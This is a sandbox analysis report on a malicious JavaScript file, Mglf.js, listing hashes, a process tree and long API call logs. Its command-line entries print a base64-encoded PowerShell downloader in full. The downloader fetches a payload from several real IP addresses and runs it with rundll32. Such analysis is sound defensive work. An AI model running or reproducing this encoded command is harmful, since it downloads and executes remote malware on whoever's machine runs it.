Summary | ZeroBOX

Mglf.js

Generic Malware Antivirus AntiVM AntiDebug PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us May 6, 2023, 11:54 a.m. May 6, 2023, 11:56 a.m.
Size 49.7KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 45eac67359c6b58b731a4680108ed5cc
SHA256 3596ce67d368a3ab9f5c8c3d906c6bd77c74146df372aa610dfd75158d58a18a
CRC32 1A90245E
ssdeep 768:8FW0CtJKwVXlaoruAXuTw99DH4ZLYv8O5Gisy+UhCBUNcknWphqDL52f+mlVcuyQ:8VCt9Lvv8Z7BGGgDLlij3XV5hOlC
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Mglf.js

    1608
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Mglf.js" Subjugal StalingradSkittery

      2144
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="

        2276

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e0f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071da38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e7b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02531000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02532000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04893000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04895000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04896000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04897000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04898000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04899000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0489f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
